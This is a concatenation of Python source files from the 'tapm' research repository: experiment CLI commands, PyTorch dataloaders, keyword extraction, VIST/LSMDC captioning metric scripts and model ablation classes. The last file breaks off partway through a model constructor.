keys = {v: i for i, v in enumerate(keys)}
clustering_names = defaultdict(list)
for key, idx in keys.items():
view = key[0] # get dataset+model name
clustering_name = key[1]
clustering_names[clustering_name].append(idx)
pairs = list(clustering_names.values())
return pairs
``` |
{
"source": "JiwanChung/tapm",
"score": 2
} |
#### File: tapm/code/cli.py
```python
import os
import json
from exp import ex
from args import get_args
from train import _train
from utils import wait_for_key, count_parameters
from evaluate import _evaluate
from infer import _infer
from vis_tsne import _tsne, _silhouette
from distance import _distance
from extract_keyword import extract_and_save_all
from model import get_model_options
from ckpt import get_model_ckpt
from loss.loss import get_loss
from optimizer import get_optimizer
from data.dataloader import get_dataloaders
from logger import get_logger
from scripts import run_script
@ex.capture
def prepare_model(model_name):
return get_model_ckpt(model_name)
def prepare(no_logger=False):
logger = get_logger(log_file=no_logger)
model, tokenizer, ckpt, datasets, epoch = prepare_model()
dataloaders = get_dataloaders(datasets, model.make_batch, tokenizer)
'''
args.batch_per_epoch = {}
for key in dataloaders.keys():
args.batch_per_epoch[key] = \
math.ceil(len(dataloaders[key]) / args.batch_sizes[key])
'''
loss_fn = get_loss(padding_idx=tokenizer.pad_id)
optimizers = get_optimizer(model, dataloaders)
model.ckpt_epoch = epoch
return model, loss_fn, optimizers, tokenizer, dataloaders, logger
@ex.command
def train():
all_args = prepare()
res = _train(*all_args)
logger = all_args[-1]
# hold process to keep tensorboard alive
if 'tfboard' in logger.logger_dests:
wait_for_key()
return res
@ex.command
def evaluate(log_path):
all_args = prepare(no_logger=True)
stats, _, texts = _evaluate(*all_args, key='val', print_output=False)
print(stats)
model = all_args[0]
assert hasattr(model, 'ckpt_path'), "no ckpt loaded"
path = model.ckpt_path
parent = path.parent.parent.parent
dir_name = path.parent.stem
parent = parent / "evals" / dir_name
os.makedirs(parent, exist_ok=True)
with open(parent / 'eval_stats.json', 'w') as f:
json.dump(stats, f)
with open(parent / 'eval_text.json', 'w') as f:
json.dump(texts, f)
@ex.command
def tsne(log_path, test_path):
# all_args = prepare({'use_data': 'val', 'sample': True})
all_args = prepare()
_tsne(*all_args, key='test')
@ex.command
def silhouette(log_path):
# all_args = prepare({'use_data': 'val', 'sample': True})
all_args = prepare()
_silhouette(*all_args, key='test')
@ex.command
def distance(log_path):
# all_args = prepare({'use_data': 'val', 'sample': True})
all_args = prepare()
_distance(*all_args, key='val')
@ex.command
def infer():
#all_args = prepare({'use_data': 'val'})
all_args = prepare()
texts = _infer(*all_args)
@ex.command
def model_stats():
#all_args = prepare({'use_data': 'val'})
all_args = prepare(no_logger=True)
model = all_args[0]
stats = {}
stats['parameter_counts'] = count_parameters(model)
print(stats)
@ex.command
def extract():
model, _, _, tokenizer, \
dataloaders, _ = prepare()
for dataloader in dataloaders.values():
dataloader.training = False
extract_and_save_all(model, tokenizer, dataloaders)
@ex.command
def scripts(script):
run_script(script)
@ex.command
def print_models():
print(sorted(get_model_options()))
@ex.option_hook
def update_args(options):
args = get_args(options)
print(sorted(args.items()))
ex.add_config(args)
@ex.automain
def run():
train()
```
#### File: code/data/dataloader.py
```python
import json
from torch.utils import data
from munch import Munch
from nltk.stem import WordNetLemmatizer
from exp import ex
from .task_loaders import load_tasks
from .tokenizer import build_tokenizer
class Dataset(data.Dataset):
def __init__(self, data_path):
super(Dataset, self).__init__()
self.data, self.global_data, \
self.task, self.path = load_tasks(data_path)
self.list_ids = list(self.data.keys())
def __len__(self):
return len(self.list_ids)
def __getitem__(self, idx):
idx = self.list_ids[idx]
return idx, self.data[idx]
class DataLoader(data.DataLoader):
def __init__(self, *args, **kwargs):
self.name = kwargs.pop('name')
self.training = kwargs.pop('training', self.name == 'train')
self.device = kwargs.pop('device')
self.tokenizer = kwargs.pop('tokenizer')
self.make_batch = kwargs.pop('batch_func')
self.max_sentence_tokens = kwargs.pop('max_sentence_tokens')
self.feature_name_map = kwargs.pop('feature_name_map')
self.concat_group = kwargs.pop('concat_group')
self.use_vist = kwargs.pop('use_vist')
self.force_ascii = kwargs.pop('force_ascii')
self.lemmatizer = WordNetLemmatizer()
kwargs['collate_fn'] = self.pad_collate
super(DataLoader, self).__init__(*args, **kwargs)
self.task = self.dataset.task
self.path = self.dataset.path
def pad_collate(self, data_li):
ids, sent_li = zip(*data_li)
res = self.make_batch(self.tokenizer, sent_li, **self.dataset.global_data,
max_sentence_tokens=self.max_sentence_tokens,
lemmatize=self.lemmatizer.lemmatize,
feature_name_map=self.feature_name_map,
concat_group=self.concat_group,
use_vist=self.use_vist,
force_ascii=self.force_ascii)
res = Munch(res)
res.id = ids
return res
@ex.capture
def get_datasets(paths, pretrain_paths, use_data):
datasets = {}
pretrain_datasets = {}
for k, p in paths.items():
if k in use_data:
print("loading {} data".format(k))
datasets[k] = Dataset(p)
if k in pretrain_paths:
print("loading pretraining {} data".format(k))
ppath = pretrain_paths[k]
if isinstance(ppath, list):
li = []
for p in ppath:
li.append(Dataset(p))
pretrain_datasets[k] = li
else:
pretrain_datasets[k] = Dataset(pretrain_paths[k])
else:
pretrain_datasets[k] = datasets[k]
return {'target': datasets, 'pretrain': pretrain_datasets}
@ex.capture
def get_dataloaders(datasets, batch_func, tokenizer,
batch_sizes, num_workers, device,
max_sentence_tokens, feature_name_map, concat_group,
use_vist, force_ascii):
dataloaders = {}
for dataset_type, type_dataset in datasets.items():
type_dataloaders = {}
for k, dataset in type_dataset.items():
shuffle = True if k == 'train' else False
def get_dataloader(dset):
nonlocal shuffle
nonlocal k
return DataLoader(dset, name=k,
batch_size=batch_sizes[k],
shuffle=shuffle, num_workers=num_workers,
batch_func=batch_func,
tokenizer=tokenizer, device=device,
max_sentence_tokens=max_sentence_tokens,
feature_name_map=feature_name_map,
concat_group=concat_group,
use_vist=use_vist,
force_ascii=force_ascii)
if isinstance(dataset, list):
li = []
for dset in dataset:
li.append(get_dataloader(dset))
type_dataloaders[k] = li
else:
type_dataloaders[k] = get_dataloader(dataset)
dataloaders[dataset_type] = type_dataloaders
return dataloaders
```
#### File: tapm/code/exp.py
```python
import inspect
from pathlib import Path
import json
import sacred
from sacred.utils import optional_kwargs_decorator
from sacred.config.signature import Signature
from sacred.config.captured_function import create_captured_function
from sacred.observers import MongoObserver, SlackObserver
#torch.multiprocessing.set_sharing_strategy('file_system') # https://github.com/pytorch/pytorch/issues/973
class LazyCapture:
def __init__(self, function=None, prefix=None):
self.fn = function
self.prefix = prefix
self.__name__ = self.fn.__name__
self.signature = Signature(self.fn)
def update_obj(self, wrap):
self.config = wrap.config
self.rnd = wrap.rnd
self.run = wrap.run
self.logger = wrap.logger
self.signature = wrap.signature
def update_func(self, cfn):
cfn.config = self.config
cfn.rnd = self.rnd
cfn.run = self.run
cfn.logger = self.logger
cfn.signature = self.signature
return cfn
def __call__(self, *args, **kwargs):
if not hasattr(self, 'lazy_fn'):
self.lazy_fn = create_captured_function(self.fn, prefix=self.prefix)
self.lazy_fn = self.update_func(self.lazy_fn)
return self.lazy_fn(*args, **kwargs)
def wrap_capture(function=None, prefix=None):
lazy_capture = LazyCapture(function, prefix=prefix)
def captured_function(*args, **kwargs):
lazy_capture.update_obj(captured_function)
return lazy_capture(*args, **kwargs)
captured_function.signature = lazy_capture.signature
captured_function.prefix = lazy_capture.prefix
return captured_function
class Experiment(sacred.Experiment):
@optional_kwargs_decorator
def capture(self, function=None, prefix=None):
if function in self.captured_functions:
return function
captured_function = wrap_capture(function, prefix=prefix)
self.captured_functions.append(captured_function)
return captured_function
exp_name = 'lsmdc'
ex = Experiment(exp_name)
def load_config(path):
path = Path(path).resolve()
if path.is_file():
with open(path, 'r') as f:
return json.load(f)
else:
return None
def add_observers():
obs_config = load_config('../observers/config.json')
if obs_config is not None and obs_config['observe']:
if 'mongo' in obs_config and obs_config['mongo']:
port = obs_config['port']
hostname = obs_config.get('hostname', 'localhost')
username = obs_config['username']
password = obs_config['password']
print(f"loading mongo observer at {hostname}:{port}")
ex.observers.append(
MongoObserver.create(
url=f'mongodb://{username}:{password}@{hostname}:{port}/{exp_name}',
db_name=exp_name))
if 'slack' in obs_config and obs_config['slack']:
print("loading slack observer")
slack_path = Path('../observers/slack.json').resolve()
if slack_path.is_file():
slack_obs = SlackObserver.from_config(str(slack_path))
ex.observers.append(slack_obs)
add_observers()
```
#### File: tapm/code/extract_keyword.py
```python
import json
import torch
import numpy as np
from tqdm import tqdm
from collections import defaultdict
from exp import ex
from tensor_utils import move_device
from path import get_dirname_from_args, get_keyword_path
from data.batcher import decode_tensor, remove_pad
def extract_keyword(model, tokenizer, dataloader,
extraction_threshold, device,
extraction_min_words):
model.eval()
threshold = extraction_threshold # prediction loss for mask_model
res = {}
ratios = []
with torch.no_grad():
for batch in tqdm(dataloader, total=len(dataloader)):
data_ids = batch['id']
batch = move_device(batch, to=device)
B = batch['sentences'].shape[0] if torch.is_tensor(batch['sentences']) else len(batch['sentences'])
targets = batch['targets']
loss, scores, ids = model(batch)
for i in range(B):
min_words = min(extraction_min_words, ids[i].shape[0])
keywords = [(key, score)
for j, (key, score) in enumerate(zip(ids[i], scores[i]))
if score < threshold or j < min_words]
keywords, score = zip(*keywords)
keywords, score = torch.Tensor(list(keywords)).to(ids[i].device), \
torch.Tensor(list(score)).to(ids[i].device).cpu().numpy().tolist()
target_len = remove_pad(targets[i], tokenizer.pad_id).shape[0] - 2 # remove cls, sep
keywords_len = remove_pad(keywords, tokenizer.pad_id).shape[0]
keywords = decode_tensor(tokenizer, keywords, split_tokens=True)
target = decode_tensor(tokenizer, targets[i])
ratios.append(keywords_len / target_len)
res[data_ids[int(i/5)]] = {'keyword': keywords, 'score': score}
ratios = np.array(ratios)
model.train()
return res, ratios
@ex.capture
def extract_and_save(key, model, tokenizer, dataloaders, data_path):
path = None
if key in data_path:
print(f"extracting keyword for {key}")
res, ratios = extract_keyword(model, tokenizer, dataloaders[key])
ratio_percentiles = [10, 20, 50, 80, 90]
ratio_percentiles = {i: np.percentile(ratios, i) for i in ratio_percentiles}
print(f"keyword ratio percentiles: {ratio_percentiles}")
path = get_keyword_path(data_path, key)
print(f"saving keyword to {path}")
with open(path, 'w') as f:
json.dump(res, f, indent=4)
return path
def extract_and_save_all(model, tokenizer, dataloaders):
extract_and_save('train', model, tokenizer, dataloaders)
extract_and_save('val', model, tokenizer, dataloaders)
extract_and_save('test', model, tokenizer, dataloaders)
```
#### File: code/metric/compare_tokenizer.py
```python
from itertools import chain
from pathlib import Path
import json
def compare(tokenizer):
path = Path('~/projects/lsmdc/data/VIST/sis/train.story-in-sequence.json').expanduser()
with open(path, 'r') as f:
data = json.load(f)['annotations']
texts = [v[0]['text'] for v in data]
orig_texts = [v[0]['original_text'] for v in data]
texts = [v.split() for v in texts]
orig_texts = [tokenizer(v.lower()) for v in orig_texts]
diff = [(i, v) for i, v in enumerate(zip(texts, orig_texts)) if len(v[0]) != len(v[1])]
print(len(diff))
return diff
def flatten_list(li):
return list(chain(*li))
def cut_apst(w):
w = w.split("'")
w = [f"'{v}" for v in w]
w[0] = w[0][1:]
return w
def cut_dot(w):
if w.endswith('.') and w != 'w' and not w.endswith('..'):
return [w[:-1], w[-1]]
else:
return [w]
def cut_dash(w):
if '--' in w and w != '--':
w = w.split("--")
w = flatten_list([['--', v] for v in w])
w = w[1:]
return w
else:
return [w]
def tok_test(s):
s = s.split()
s = flatten_list([[w[:-1], w[-1]] if w.endswith('!') else [w] for w in s])
s = flatten_list([[w[:-1], w[-1]] if w.endswith('?') else [w] for w in s])
s = flatten_list([[w[:-1], w[-1]] if w.endswith(',') and w != ',' else [w] for w in s])
s = flatten_list([cut_dot(w) for w in s])
s = flatten_list([cut_apst(w) if "'" in w and w != "'" else [w] for w in s])
s = flatten_list([cut_dash(w) for w in s])
s = [v for v in s if v != '']
s = ' '.join(s)
'''
if s[-1] == '.':
s = f"{s[:-1]} ."
'''
s = s.replace('!!!', '! ! !')
s = s.replace('!!', '! !')
s = s.replace('!?', '! ?')
s = s.replace('?!', '? !')
s = s.split(' ')
return s
```
#### File: code/metric/normalize.py
```python
import json
from collections import defaultdict
from pathlib import Path
import argparse
from vist_tokenizer import VistTokenizer
def parse_args():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-n', '--name', default='test_results.json', type=str)
parser.add_argument('-l', '--longest', action='store_true')
args = parser.parse_args()
return args
def break_tie(li, longest=False):
if longest:
res = ''
for l in li:
if len(l) >= len(res):
res = l
else:
len_res = 9999
for l in li:
if len(l) < len_res:
res = l
len_res = len(res)
return res
def main():
args = parse_args()
path = Path('~/projects/lsmdc/data/VIST/sis').expanduser()
output = normalize(args.name, args.longest)
with open(path / f"cut_{args.name}", 'w') as f:
json.dump(output, f, indent=4)
def normalize(name, longest=False):
path = Path('~/projects/lsmdc/data/VIST/sis').expanduser() / name
with open(path, 'r') as f:
data = json.load(f)['output_stories']
albums = defaultdict(dict)
for row in data:
albums[row['album_id']]['_'.join(row['photo_sequence'])] = \
row['story_text_normalized']
# get shortest generation in album
albums = {k: break_tie(list(v.values()),
longest=longest) for k, v in albums.items()}
# tokenize
tokenizer = VistTokenizer()
albums = {k: [{'caption': v}] for k, v in albums.items()}
albums = tokenizer.tokenize(albums)
output = {'output_stories': [{'album_id': k, 'photo_sequence': [],
'story_text_normalized': v[0]}
for k, v in albums.items()]}
return output
if __name__ == '__main__':
main()
```
#### File: code/metric/test_scorer.py
```python
import json
from pathlib import Path
from collections import defaultdict
import argparse
from metric_test import Metric
from normalize import normalize
def chunks(l, n):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def flatten(li):
return [item for sublist in li for item in sublist]
def parse_args():
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('-n', '--name', default='test_results.json', type=str)
parser.add_argument('-v', '--vist', type=bool, default=False)
parser.add_argument('-a', '--album', action='store_false')
parser.add_argument('-l', '--longest', action='store_true')
parser.add_argument('-c', '--cut', action='store_true')
parser.add_argument('-s', '--eval-set', action='store_true')
parser.add_argument('-dot', '--dot', action='store_true') # shift last dot
args = parser.parse_args()
return args
def shift_dot(hypo):
h = hypo['output_stories']
h = [{**v, 'story_text_normalized': _shift_dot(v['story_text_normalized'])}
for v in h]
return {'output_stories': h}
def _shift_dot(text):
if (not text.endswith(' .')) and text.endswith('.'):
text = text[:-1] + ' .'
return text
def break_tie(li, longest=True):
if longest:
res = ''
for l in li:
if len(l) >= len(res):
res = l
else:
len_res = 9999
for l in li:
if len(l) < len_res:
res = l
len_res = len(res)
return res
def load_file(name):
path = Path('~/projects/lsmdc/data/VIST/sis/samples/full').expanduser() / name
with open(path, 'r') as f:
hypo = json.load(f)
return hypo
def calc(hypo, album=True, longest=False):
hypo = hypo['output_stories']
if album:
res = defaultdict(list)
for v in hypo:
res[v['album_id']].append(v['story_text_normalized'])
hypo = {}
# tie breaking
for k, v in res.items():
hypo[k] = break_tie(v, longest)
else:
hypo = {f"{v['album_id']}_{v['photo_sequence']}": v['story_text_normalized'] for v in hypo}
tgt_name = 'albums' if album else 'images'
path = Path('../../').resolve() / 'data' / 'VIST' / 'sis' / f'post_test.story-in-sequence_{tgt_name}.json'
with open(path, 'r') as f:
tgt = json.load(f)
m = Metric(['cider', 'meteor', 'bleu', 'rouge'], False, use_vist=True, no_tokenizer=False)
print(m({k: (hypo[k], tgt[k]) for k in hypo.keys()}))
def main():
args = parse_args()
print(args)
if args.vist:
run_vist(args)
elif len(args.name.split('/')) > 1:
run_ckpt(args)
else:
run_lsmdc(args)
def run_vist(args):
if args.cut:
hypo = normalize(args.name, args.longest)
elif args.dot:
hypo = load_file(args.name)
hypo = shift_dot(hypo)
else:
hypo = load_file(args.name)
calc(hypo, args.album, args.longest)
def run_lsmdc(args, hypo=None):
root = Path('../../').resolve() / 'data' / 'LSMDC' / 'task1'
tgt_path = root / 'LSMDC16_annos_test_someone.csv'
tgt = {}
keys = []
with open(tgt_path, 'r') as f:
for line in f:
line = line.split('\t')
tgt[line[0].strip()] = line[-1].strip()
keys.append(line[0].strip())
set_keys = build_set(keys)
if hypo is None:
hypo_path = root / 'samples' / 'full' / args.name
with open(hypo_path, 'r') as f:
hypo = json.load(f)
if args.eval_set:
hypo_set = {str(i): ' '.join(hypo[key] for key in keys) for i, keys in set_keys.items()}
tgt_set = {str(i): ' '.join(tgt[key] for key in keys) for i, keys in set_keys.items()}
hypo, tgt = hypo_set, tgt_set
m = Metric(['cider', 'meteor', 'bleu', 'rouge'], False, use_vist=False, no_tokenizer=False)
print(m({k: (hypo[k], tgt[k]) for k in hypo.keys()}))
def build_set(keys):
res = defaultdict(list)
for key in keys:
name = key[:key.rfind('_')]
res[name].append(key)
res = {k: [(f"{k}_{i}", v2) for i, v2 in enumerate(list(chunks(v, 5)))] for k, v in res.items()}
return dict(flatten(res.values()))
def run_ckpt(args):
ckpt = Path('../../').resolve() / 'data' / 'ckpt'
dir_name = args.name.split('/')
dir_name, file_name = dir_name
dir_path = list(ckpt.glob(dir_name))
assert len(dir_path) > 0, f"nonexisting dir name {dir_name}"
dir_path = dir_path[0]
file_path = list(dir_path.glob(file_name))
assert len(file_path) > 0, f"nonexisting file name {file_name}"
file_path = file_path[0]
print(f"Loading from {file_path}")
with open(file_path, 'r') as f:
hypo = json.load(f)
hypo = dict({k: v[0] for k, v in hypo.items()})
run_lsmdc(args, hypo)
if __name__ == '__main__':
main()
```
#### File: code/model/ablations.py
```python
from torch import nn
import torch.nn.functional as F
from exp import ex
from .temporal_corr import TemporalCorrGlobal
from .no_gt import NoGtSos
# from .ss_loss import calc_l2_loss
class AblationJointSS(TemporalCorrGlobal):
def forward(self, batch, **kwargs):
return self._forward(batch, **kwargs)
class AblationNoSS(TemporalCorrGlobal):
def forward(self, batch, **kwargs):
hypo, logit, target, reg_loss, stats, batch = self._forward(batch, **kwargs)
reg_loss = None
return hypo, logit, target, reg_loss, stats, batch
class AblationSplitGen(TemporalCorrGlobal):
def forward(self, batch, **kwargs):
if self.training:
self.fix_gpt(kwargs.get('epoch', 0))
hypo, logit, target, reg_loss, stats, batch = self._forward(batch, **kwargs)
reg_loss = None
return hypo, logit, target, reg_loss, stats, batch
class AblationNoPred(TemporalCorrGlobal):
def get_reg_loss(self, h, c, group_mask):
rank_loss, rank_stats = self.get_rank_loss(h, c, group_mask)
return rank_loss, rank_stats
class AblationNoMatch(TemporalCorrGlobal):
def get_reg_loss(self, h, c, group_mask):
roll_loss, roll_stats = self.get_roll_losses(h, c, group_mask)
return roll_loss, roll_stats
class AblationS(NoGtSos):
def mean_pool_text(self, o):
# BGLC
return o.mean(dim=2) # use the [sos] token only
class AblationLossL2(NoGtSos):
@ex.capture
def __init__(self, transformer, tokenizer, dropout_before, fix_gpt_epoch):
super().__init__(transformer, tokenizer, dropout_before, fix_gpt_epoch)
def calc_l2_loss(self, x1, x2, group_mask=None, margin=None, pool='mean', skip_idx=0):
loss = F.mse_loss(x1, x2, reduction=pool)
acc = 0
return loss, acc
def run_rank_loss(self, x1, x2, group_mask, skip_idx=0):
x1 = x1.view(-1, x1.shape[-1])
x2 = x2.view(-1, x2.shape[-1])
group_mask = group_mask.view(-1)
loss1, acc1 = self.calc_l2_loss(x1, x2, group_mask,
margin=self.margin, pool='mean',
skip_idx=skip_idx)
loss2, acc2 = self.calc_l2_loss(x2, x1, group_mask,
margin=self.margin, pool='mean',
skip_idx=-skip_idx)
return loss1, acc1, loss2, acc2
class AblationLossCycle(NoGtSos):
@ex.capture
def __init__(self, transformer, tokenizer, dropout_before, fix_gpt_epoch):
super().__init__(transformer, tokenizer, dropout_before, fix_gpt_epoch)
dim = self.gpt_dim
self.cycle_linears = nn.ModuleDict({
'vis_to_txt': nn.Linear(dim, dim),
'txt_to_vis': nn.Linear(dim, dim),
})
def calc_cycle_loss(self, x1, x2, group_mask=None, pool='mean', skip_idx=0):
l1 = F.mse_loss(self.cycle_linears['vis_to_txt'](x2), x1.detach(), reduction=pool)
l2 = F.mse_loss(self.cycle_linears['txt_to_vis'](x1), x2.detach(), reduction=pool)
return l1, l2
def get_rank_loss(self, h, c, group_mask, skip_idx=0):
x1 = F.normalize(h)
x2 = F.normalize(c)
l1, l2 = self.run_rank_loss(x1, x2, group_mask, skip_idx)
loss = l1 + l2
# stats = {'rank_accuracy': acc}
stats = {'loss_ttov': l1.item(), 'loss_vtot': l2.item()}
return loss, stats
def run_rank_loss(self, x1, x2, group_mask, skip_idx=0):
x1 = x1.view(-1, x1.shape[-1])
x2 = x2.view(-1, x2.shape[-1])
group_mask = group_mask.view(-1)
l1, l2 = self.calc_cycle_loss(x1, x2, group_mask, pool='mean', skip_idx=skip_idx)
return l1, l2
def get_reg_loss(self, h, c, group_mask):
loss, stats = self.get_rank_loss(h, c, group_mask)
return loss, stats
class AblationIterSS(TemporalCorrGlobal):
@classmethod
def get_args(cls):
return {
**super().get_args(),
'iter_ss': 1
}
@ex.capture
def __init__(self, transformer, tokenizer, dropout_before, fix_gpt_epoch,
iter_ss):
super().__init__(transformer, tokenizer, dropout_before, fix_gpt_epoch)
self.iter_ss = iter_ss
self.current_epoch = -1
def fix_gpt(self, epoch):
if epoch != self.current_epoch:
if (epoch + 1) % self.iter_ss == 0:
# revert ss
if not self.net.transformer.weight_freezed:
self._fix_gpt()
self.net.transformer.weight_freezed = True
else:
self._fix_gpt(False)
self.net.transformer.weight_freezed = False
self.reset_optimizer = True
self.current_epoch = epoch
```
#### File: code/model/autoencoder.py
```python
import torch
from torch import nn
import torch.nn.functional as F
from data.batcher import make_autoencoder_batch, make_bert_batch
from tensor_utils import remove_cls_sep
from .transformer_model import TransformerModel
from .encoder import Encoder
from .decoder import Decoder
from .sparsemax import Sparsemax
from .modules import LSTMDecoder, l_n_norm
class Autoencoder(TransformerModel):
transformer_name = 'gpt2'
def __init__(self, args, transformers, tokenizer):
super(Autoencoder, self).__init__()
self.use_keyword = args.use_keyword
if self.use_keyword:
self.encoder = Encoder(args, transformers['encoder'], tokenizer)
self.decoder = Decoder(args, transformers['decoder'], tokenizer)
def make_batch(self, *args, **kwargs):
return make_autoencoder_batch(*args, **kwargs)
def forward(self, batch, **kwargs):
sentence = batch.sentences
targets = batch.targets
lengths = batch.lengths
if self.use_keyword:
keywords, keyword_lengths, scores, reg_loss = \
self.encoder(sentence, lengths)
else:
keywords, keyword_lengths, scores, reg_loss = None, None, None, None
logits = self.decoder(sentence, lengths,
keywords, keyword_lengths, scores)
return logits, targets, reg_loss, {'prob': scores.mean().item()}, keywords
class MultiLabelAutoencoder(TransformerModel):
transformer_name = 'bert'
def __init__(self, args, transformer, tokenizer):
super(MultiLabelAutoencoder, self).__init__()
self.threshold_keyword = args.get('threshold_keyword', False)
self.extraction_min_words = args.extraction_min_words
self.keyword_ratio = args.keyword_ratio
self.use_reg_loss = args.get('use_reg_loss', False)
self.net = transformer
self.net.train()
self.tokenizer = tokenizer
bert_dim = self.net.bert.config.hidden_size
# self.reduce_dim = nn.Linear(bert_dim * 2, bert_dim)
self.keyword_linear = nn.Linear(bert_dim, bert_dim)
self.use_bert = False
if not self.use_bert:
self.decoder = LSTMDecoder(self.net.bert.embeddings.word_embeddings)
self.keyword_activation = args.get('keyword_activation', 'sparsemax')
self.keyword_activation = {
'softmax': self.softmax,
'sparsemax': self.sparsemax,
'sigmoid': self.sigmoid,
'saturating_sigmoid': self.saturating_sigmoid,
}[self.keyword_activation.lower()]
self.loss_norm_n = args.get('loss_norm_n', 1)
self.reduce_dim = nn.Linear(bert_dim * 2, bert_dim)
def get_l_n_loss(self, x, lengths):
x = F.relu(x)
reg_loss = l_n_norm(x, n=self.loss_norm_n, dim=-1)
reg_loss = F.relu(reg_loss - self.extraction_min_words)
max_keyword_num = torch.max(torch.LongTensor([self.extraction_min_words]).to(lengths.device),
(lengths.float() * self.keyword_ratio).ceil().long())
max_limit_loss = F.relu(max_keyword_num.float() - l_n_norm(x, n=1, dim=-1))
reg_loss = reg_loss + max_limit_loss
return reg_loss.mean()
def keyword_activation_loss(self, x, lengths):
x = self.keyword_activation(x)
reg_loss = self.get_l_n_loss(x, lengths)
return x, reg_loss
def softmax(self, x):
x = F.softmax(x, dim=-1)
return x
def sparsemax(self, x):
mm = Sparsemax(dim=-1)
x = mm(x)
return x
def sigmoid(self, x):
x = torch.sigmoid(x)
return x
def saturating_sigmoid(self, x):
x = 1.2 * torch.sigmoid(x) - 0.1
x = x.clamp(0, 1)
return x
def make_batch(self, *args, **kwargs):
return make_bert_batch(*args, **kwargs)
def pool(self, x, dim=-1):
return x.mean(dim=dim)
def extend_attention_mask(self, input_ids, attention_mask):
if attention_mask is None:
attention_mask = torch.ones_like(input_ids)
extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)
extended_attention_mask = extended_attention_mask.to(dtype=next(self.net.bert.parameters()).dtype) # fp16 compatibility
extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0
return extended_attention_mask
def get_head_mask(self):
head_mask = [None] * self.net.bert.config.num_hidden_layers
return head_mask
def get_position_embeddings(self, input_ids):
position_ids = torch.arange(input_ids.shape[1], dtype=torch.long, device=input_ids.device)
position_ids = position_ids.unsqueeze(0).expand_as(input_ids)
return self.net.bert.embeddings.position_embeddings(position_ids)
def keyword_thresholding(self, p, lengths):
if self.threshold_keyword:
max_keyword_num = torch.max(torch.LongTensor([self.extraction_min_words]).to(lengths.device),
(lengths.float() * self.keyword_ratio).ceil().long())
p_sorted, _ = p.sort(dim=-1, descending=True) # BC
min_vals = p_sorted.gather(dim=-1, index=(max_keyword_num - 1).unsqueeze(-1)) # keep ties
keyword_mask = (p >= min_vals)
p = p * keyword_mask.float()
return p
def mask_keyword(self, p, sentences):
# BV, BL
src = torch.FloatTensor([0]).to(p.device).view(1, 1, 1)
p = p.unsqueeze(1).expand(*sentences.shape, p.shape[-1])
temp = torch.full_like(p, 0)
sentences = sentences.unsqueeze(-1).expand(*sentences.shape, p.shape[-1])
temp = temp.scatter(dim=-1, index=sentences,
src=p)
# BLV
p = temp.sum(dim=1)
p = F.normalize(p, p=1, dim=-1)
return p
def forward(self, batch, **kwargs):
sentences = batch.sentences
targets = batch.targets
lengths = batch.lengths
attention_mask = sentences != self.tokenizer.pad_id
extended_attention_mask = self.extend_attention_mask(sentences, attention_mask)
encoder_out = self.net.bert(sentences, attention_mask=attention_mask)[0]
encoder_out = self.pool(encoder_out, dim=1) # BC
encoder_out = self.net.cls(encoder_out)
keyword_prob, reg_loss = self.keyword_activation_loss(encoder_out, lengths)
keyword_prob = self.mask_keyword(keyword_prob, sentences)
keyword_prob_t = self.keyword_thresholding(keyword_prob, lengths)
keyword_att = torch.matmul(keyword_prob_t, self.net.bert.embeddings.word_embeddings.weight)
L = sentences.shape[1]
keyword_att = self.keyword_linear(keyword_att)
if self.use_bert:
keyword_att = keyword_att.unsqueeze(1).expand(-1, L, -1)
decoder_in = keyword_att + self.get_position_embeddings(sentences)
head_mask = self.get_head_mask()
decoder_out = self.net.bert.encoder(decoder_in, extended_attention_mask,
head_mask=head_mask)[0]
logits = self.net.cls(decoder_out)
else:
dec_input, target = remove_cls_sep(targets, self.tokenizer)
dec_input = self.net.bert.embeddings.word_embeddings(dec_input)
dec_input = torch.cat((dec_input, keyword_att.unsqueeze(1).expand_as(dec_input)), dim=-1)
dec_input = self.reduce_dim(dec_input)
logits = self.decoder(keyword_att, dec_input, embedded=True)
with torch.no_grad():
stats = {
'keyword_l2': ((keyword_prob ** 2).sum(dim=-1) ** 0.5).mean().item(),
'keyword_l1': keyword_prob.sum(dim=-1).mean().item(),
'keyword>0.1': (keyword_prob > 0.1).sum(dim=-1).float().mean().item(),
'keyword>0': (keyword_prob > 0).sum(dim=-1).float().mean().item(),
}
if self.threshold_keyword:
stats = {
**stats,
'keyword_nonzero': (keyword_prob_t > 0).sum(dim=-1).float().mean().item(),
}
scores, keywords = keyword_prob.sort(dim=-1, descending=True) # BV
keywords = keywords[:, :10]
scores = scores[:, :10]
if not self.use_reg_loss:
reg_loss = None
return logits, targets, reg_loss, stats, (keywords, scores)
```
#### File: code/model/hybrid_dis.py
```python
from collections import OrderedDict
import torch
from torch import nn
import torch.nn.functional as F
from exp import ex
from utils import jsonl_to_json, mean
from data.batcher import make_feature_lm_batch_with_keywords, ConvertToken
from .modules import Attention, GRU
from .scn_rnn import SCNLSTM
from .transformer_model import TransformerModel
from .keyword_classifier import KeywordClassifier
'''
currently, this implementation deviates from the original repo
in the following regards:
1. GRU instead of LSTM
2. An (deactivated) option to share in_out embeddings
Aside from the above, I tried to closely follow the given details.
'''
class HybridDis(TransformerModel):
transformer_name = 'none' # assign transformer_name = 'bert' to use BPE
model_type = 'caption'
use_keyword = False
task = 1
@classmethod
def get_args(cls):
return {
'dim': 512,
'pretrained_embedding': False,
'keyword_classification_loss': 'bce',
'keyword_top_k': 20,
'use_gt_keywords': False,
'use_word_subset': False,
'share_in_out': False,
'keyword_num': 1000,
'dropout': 0.5,
'decoder_type': 'scn',
}
@ex.capture
def __init__(self, transformer, tokenizer,
dim, keyword_num, dropout, visual_dropout, feature_names, feature_dims,
share_in_out, use_gt_keywords, use_word_subset, max_target_len,
keyword_top_k, keyword_classification_loss, pretrained_embedding,
decoder_type, normalizer_sparsity):
super(HybridDis, self).__init__()
self.eps = 1e-09
self.normalizer_alpha = None
if normalizer_sparsity == 'adaptive':
self.normalizer_alpha = nn.Parameter(torch.ones(1) * 1.2, requires_grad=True)
self.dim = dim
self.keyword_num = keyword_num
self.dropout_ratio = dropout
self.visual_dropout_ratio = visual_dropout
self.feature_names = feature_names
self.feature_dims = {k: v for k, v in feature_dims.items() if k in self.feature_names}
self.share_in_out = share_in_out
self.use_gt_keywords = use_gt_keywords
self.use_word_subset = use_word_subset
self.max_target_len = max_target_len
self.tokenizer = tokenizer
